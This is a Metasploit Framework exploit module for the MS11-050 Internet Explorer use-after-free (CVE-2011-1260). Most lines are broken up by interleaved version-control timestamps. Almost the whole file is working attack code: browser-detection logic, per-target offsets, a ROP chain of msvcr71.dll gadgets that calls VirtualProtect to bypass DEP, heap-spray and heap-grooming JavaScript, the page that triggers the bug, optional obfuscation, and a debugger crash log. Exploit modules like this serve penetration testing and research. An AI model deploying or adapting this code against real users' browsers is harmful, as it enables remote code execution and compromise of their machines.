2011-06-16 21:19:12 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-06-16 21:19:12 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2011-09-15 20:51:01 +00:00
|
|
|
Rank = NormalRanking
|
2011-06-16 21:19:12 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
autopwn_info({
|
|
|
|
:ua_name => HttpClients::IE,
|
|
|
|
:ua_minver => "7.0",
|
|
|
|
:ua_maxver => "8.0",
|
|
|
|
:javascript => true,
|
|
|
|
:os_name => OperatingSystems::WINDOWS,
|
2012-04-09 07:23:44 +00:00
|
|
|
# If it's IE 8, then we need .net to bypass ASLR
|
|
|
|
:vuln_test => %Q|
|
|
|
|
if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
|
|
|
|
if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
|
|
|
|
}
|
|
|
|
|,
|
2011-06-16 21:19:12 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a use-after-free vulnerability in Internet Explorer. The
|
2011-07-06 07:22:24 +00:00
|
|
|
vulnerability occurs when an invalid <object> tag exists and other elements
|
|
|
|
overlap/cover where the object tag should be when rendered (due to their
|
|
|
|
styles/positioning). The mshtml!CObjectElement is then freed from memory because
|
|
|
|
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
|
|
|
|
a reference to the freed <object> and attempts to call a function on it, leading
|
|
|
|
to the use-after-free.
|
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
|
|
|
|
to bypass DEP (Data Execution Prevention).
|
2011-06-16 21:19:12 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => "$Revision$",
|
|
|
|
'Author' =>
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
'd0c_s4vage', #Discovery, poc
|
|
|
|
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
|
|
|
|
'bannedit', #Windows 7
|
2011-06-16 21:19:12 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
2011-06-17 17:35:57 +00:00
|
|
|
['CVE', '2011-1260'],
|
|
|
|
['OSVDB', '72950'],
|
2011-06-16 21:19:12 +00:00
|
|
|
['MSB', 'MS11-050'],
|
|
|
|
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
'InitialAutoRunScript' => 'migrate -f',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 500,
|
|
|
|
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ],
|
|
|
|
# In IE6 the mshtml!CObjectElement size is 0xac
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
'Internet Explorer 7 on XP SP3',
|
2011-06-16 21:19:12 +00:00
|
|
|
{
|
2011-09-15 20:51:01 +00:00
|
|
|
'Rop' => false,
|
|
|
|
'Ret' => nil, #Not required for non-ROP targets
|
|
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
|
|
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
|
|
|
'Offset' => '0x01',
|
2011-06-16 21:19:12 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
'Internet Explorer 7 on Windows Vista',
|
2011-06-16 21:19:12 +00:00
|
|
|
{
|
2011-09-15 20:51:01 +00:00
|
|
|
'Rop' => false,
|
|
|
|
'Ret' => nil, #Not required for non-ROP targets
|
|
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
|
|
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
|
|
|
'Offset' => '0x01',
|
2011-06-16 21:19:12 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
'Internet Explorer 8 on XP SP3',
|
2011-06-16 21:19:12 +00:00
|
|
|
{
|
2011-09-15 20:51:01 +00:00
|
|
|
'Rop' => true,
|
|
|
|
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
|
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
|
|
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
|
|
|
'Offset' => '0x5E2',
|
2011-06-16 21:19:12 +00:00
|
|
|
}
|
|
|
|
],
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
'Internet Explorer 8 on Windows 7',
|
|
|
|
{
|
|
|
|
'Rop' => true,
|
|
|
|
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
|
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
|
|
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
|
|
|
'Offset' => '0x5F4',
|
|
|
|
}
|
2011-06-16 21:19:12 +00:00
|
|
|
],
|
2011-09-15 20:51:01 +00:00
|
|
|
[ 'Debug Target (Crash)', {} ],
|
2011-06-16 21:19:12 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => "Jun 16 2011",
|
|
|
|
'DefaultTarget' => 0))
|
2011-08-11 15:50:43 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2011-09-15 20:51:01 +00:00
|
|
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
2011-08-11 15:50:43 +00:00
|
|
|
], self.class)
|
2011-06-16 21:19:12 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def auto_target(cli, request)
|
|
|
|
agent = request.headers['User-Agent']
|
2011-09-15 20:51:01 +00:00
|
|
|
|
|
|
|
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
|
|
|
|
#Windows XP + IE7
|
2011-06-16 21:19:12 +00:00
|
|
|
mytarget = targets[1]
|
2011-09-15 20:51:01 +00:00
|
|
|
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
|
|
|
|
#Windows Vista + IE7
|
|
|
|
mytarget = targets[2]
|
|
|
|
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
|
|
|
|
#Windows XP + IE8
|
|
|
|
mytarget = targets[3]
|
|
|
|
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
|
|
|
|
#Windows 7 + IE8
|
|
|
|
mytarget = targets[4]
|
2011-06-16 21:19:12 +00:00
|
|
|
else
|
2011-09-15 20:51:01 +00:00
|
|
|
mytarget = nil
|
2011-06-16 21:19:12 +00:00
|
|
|
end
|
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
return mytarget
|
2011-06-16 21:19:12 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
2011-09-15 20:51:01 +00:00
|
|
|
#Set default target
|
2011-06-16 21:19:12 +00:00
|
|
|
mytarget = target
|
2011-09-15 20:51:01 +00:00
|
|
|
debug = false
|
|
|
|
|
2011-06-16 21:19:12 +00:00
|
|
|
if target.name == 'Automatic'
|
|
|
|
mytarget = auto_target(cli, request)
|
2011-09-15 20:51:01 +00:00
|
|
|
if mytarget.nil?
|
2012-01-02 09:41:49 +00:00
|
|
|
agent = request.headers['User-Agent']
|
2012-04-09 07:23:44 +00:00
|
|
|
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
|
2011-06-16 21:19:12 +00:00
|
|
|
send_not_found(cli)
|
|
|
|
return
|
|
|
|
end
|
2011-09-15 20:51:01 +00:00
|
|
|
elsif target.name =~ /Debug/
|
|
|
|
debug = true
|
2011-06-16 21:19:12 +00:00
|
|
|
end
|
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
if debug
|
2011-06-16 21:19:12 +00:00
|
|
|
data = <<-DATA
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<script language='javascript'>
|
2011-07-24 00:22:29 +00:00
|
|
|
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
|
|
|
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
2011-06-16 21:19:12 +00:00
|
|
|
document.body.innerHTML += "AAAAAAA";
|
2011-07-24 00:22:29 +00:00
|
|
|
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
2011-06-16 21:19:12 +00:00
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
DATA
|
|
|
|
|
2012-04-09 07:23:44 +00:00
|
|
|
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...")
|
2011-06-16 21:19:12 +00:00
|
|
|
send_response(cli, data, { 'Content-Type' => 'text/html' })
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
#In case we're using ROP, initialize it now
|
|
|
|
code = ''
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
if mytarget['Rop']
|
|
|
|
# !mona -m msvcr71 rop
|
2011-10-23 11:56:13 +00:00
|
|
|
code = [
|
2011-09-15 20:51:01 +00:00
|
|
|
0x7c376402, # POP EBP # RETN [msvcr71.dll]
|
|
|
|
0x7c376402, # skip 4 bytes [msvcr71.dll]
|
|
|
|
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
|
|
|
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
|
|
|
|
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
|
|
|
|
0x7c354901, # POP EBX # RETN [msvcr71.dll]
|
|
|
|
0xffffffff,
|
|
|
|
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
|
|
|
|
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
|
|
|
|
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
|
|
|
|
0xffffffc0, # Value to negate, will become 0x00000040
|
|
|
|
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
|
|
|
|
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
|
|
|
|
0x7c38b001, # &Writable location [msvcr71.dll]
|
|
|
|
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
|
|
|
|
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
|
|
|
|
0x7c364802, # POP ESI # RETN [msvcr71.dll]
|
|
|
|
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
|
|
|
|
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
|
|
|
|
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
|
2011-10-17 03:49:49 +00:00
|
|
|
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
|
2011-09-15 20:51:01 +00:00
|
|
|
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
|
|
|
|
].pack("V*")
|
|
|
|
|
|
|
|
code << "\x90"*20 #Nops
|
|
|
|
code << "\xeb\x04\xff\xff" #Jmp over the pivot
|
|
|
|
code << [mytarget.ret].pack('V') #Stack pivot
|
|
|
|
end
|
2011-07-06 07:22:24 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
code << payload.encoded
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
# fill the vtable
|
|
|
|
vtable = [mytarget['TargetAddr']].pack('V*')
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
#Convert code format so we can unescape() in JavaScript
|
|
|
|
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
|
|
|
|
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
#Extract string based on what the setup is
|
|
|
|
if mytarget.name == 'Internet Explorer 8 on XP SP3'
|
|
|
|
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
|
|
|
|
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
|
|
|
|
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
|
|
|
|
else
|
|
|
|
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
|
|
|
|
end
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
js = <<-JS
|
|
|
|
function timedRefresh(timeoutPeriod) {
|
|
|
|
setTimeout("location.reload(true);",timeoutPeriod);
|
|
|
|
}
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
function enable_lfh(heaplib_obj, obj_size, max) {
|
|
|
|
var vtable = unescape("#{vtable_js}");
|
|
|
|
while (vtable.length < obj_size) vtable += vtable;
|
|
|
|
var obj = vtable.substring(0, (obj_size-6)/2);
|
|
|
|
for (var i=1; i < max; i++) {
|
|
|
|
heaplib_obj.alloc(obj);
|
|
|
|
}
|
|
|
|
}
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
function heap_spray(heaplib_obj, offset) {
|
|
|
|
var code = unescape("#{code_js}");
|
|
|
|
var nops = unescape("%u0c0c%u0c0c");
|
|
|
|
|
|
|
|
while (nops.length < 0x1000) nops += nops;
|
2011-09-21 03:13:45 +00:00
|
|
|
offset = nops.substring(0, #{mytarget['Offset']});
|
2011-09-15 20:51:01 +00:00
|
|
|
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
|
|
|
while (shellcode.length < 0x40000) shellcode += shellcode;
|
|
|
|
#{js_extract_str}
|
2011-09-15 22:37:13 +00:00
|
|
|
heaplib_obj.gc();
|
2011-09-15 20:51:01 +00:00
|
|
|
for (var i2=0; i2 < 0x400-1; i2++) {
|
2011-09-15 22:37:13 +00:00
|
|
|
heaplib_obj.alloc(block);
|
2011-09-15 20:51:01 +00:00
|
|
|
}
|
|
|
|
}
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
heap = new heapLib.ie(0x20000);
|
|
|
|
heap_spray(heap, #{mytarget['Offset']});
|
|
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
|
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
2011-06-16 21:19:12 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
|
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
2011-07-24 00:22:29 +00:00
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
|
|
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
|
2011-07-24 00:22:29 +00:00
|
|
|
|
|
|
|
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
2011-09-15 20:51:01 +00:00
|
|
|
|
|
|
|
timedRefresh(2000);
|
2011-06-16 21:19:12 +00:00
|
|
|
JS
|
|
|
|
|
2011-09-15 20:51:01 +00:00
|
|
|
js = heaplib(js, {:noobfu => true})
|
2011-08-11 15:50:43 +00:00
|
|
|
|
|
|
|
if datastore['OBFUSCATE']
|
|
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
|
|
|
js.obfuscate
|
|
|
|
end
|
2011-06-16 21:19:12 +00:00
|
|
|
|
|
|
|
html = <<-HTML
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<script language='javascript'>
|
|
|
|
#{js}
|
|
|
|
</script>
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
HTML
|
|
|
|
|
2012-04-09 07:23:44 +00:00
|
|
|
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...")
|
2011-06-16 21:19:12 +00:00
|
|
|
send_response(cli, html, {'Content-Type'=>'text/html'})
|
|
|
|
end
|
2011-06-16 22:27:10 +00:00
|
|
|
end
|
2011-09-15 20:51:01 +00:00
|
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
(b00.1ac): Access violation - code c0000005 (first chance)
|
|
|
|
First chance exceptions are reported before any exception handling.
|
|
|
|
This exception may be expected and handled.
|
|
|
|
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
|
|
|
|
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
|
|
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
|
|
mshtml!CElement::Doc+0x2:
|
|
|
|
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
|
2011-09-15 22:37:13 +00:00
|
|
|
=end
|